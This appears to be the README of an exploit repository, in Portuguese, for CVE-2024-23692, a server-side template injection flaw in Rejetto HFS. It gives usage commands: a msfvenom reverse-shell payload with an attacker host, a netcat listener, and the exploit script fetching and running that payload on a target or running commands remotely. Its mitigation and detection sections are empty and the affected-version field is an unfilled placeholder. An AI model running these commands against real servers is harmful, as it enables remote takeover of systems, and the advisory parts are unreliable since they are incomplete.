
Rejetto HFS (HTTP File Server) é um servidor de arquivos web simples que facilita o compartilhamento de arquivos através de uma rede ou da internet.
Rejetto HFS (HTTP File Server) é um servidor de arquivos web simples que facilita o compartilhamento de arquivos através de uma rede ou da internet. Apesar de sua facilidade de uso e simplicidade, uma vulnerabilidade crítica (CVE-2024-23692) foi descoberta, tornando o servidor um alvo para atacantes.
CVE-2024-23692 é uma vulnerabilidade de Injeção de Template no Lado do Servidor (SSTI) identificada no Rejetto HFS. Essa vulnerabilidade permite que um atacante injete e execute templates maliciosos no servidor. Se explorada, pode levar à execução remota de código, potencialmente comprometendo todo o servidor e os dados que ele hospeda.
Um atacante que explore esta vulnerabilidade pode:
Obtenha um shell usando um binário malicioso criado com msfvenom.
Nota: Deixe o nc ouvindo.
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe
![[Screenshot_1.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_1.png)
Execute um comando remotamente.
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo
Pode levar aproximadamente 15 segundos para exibir o resultado.
![[Screenshot_2.png]](https://github.com/Mr-r00t11/CVE-2024-23692/blob/main/img/Screenshot_2.png)
Todas as versões do Rejetto HFS até e incluindo a versão [insira aqui a versão vulnerável mais recente] são afetadas por esta vulnerabilidade.
Para mitigar o risco representado pelo CVE-2024-23692, os usuários são aconselhados a:
Para determinar se seu servidor foi comprometido, procure por:
Para mais assistência e suporte, consulte os fóruns da comunidade do Rejetto HFS ou os canais oficiais de suporte.
Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.